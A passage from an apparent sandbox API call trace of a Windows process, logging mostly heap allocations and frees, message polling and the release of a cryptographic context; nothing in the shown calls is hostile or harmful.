hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0188.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0188.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0188.384] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0188.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0188.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0188.384] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0188.385] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0188.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0188.385] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0188.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0188.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0188.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0188.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0188.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0188.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0188.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0188.386] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0188.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0188.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0188.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0188.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0188.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0188.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0188.387] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0188.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0188.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0188.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0188.387] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0188.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0188.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0188.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0188.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0188.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0188.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0188.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.389] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0188.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0188.389] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0188.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0188.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0188.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0188.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0188.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0188.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0188.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0188.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0188.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0188.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0188.391] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0188.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0188.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.392] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0188.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0188.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0188.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: 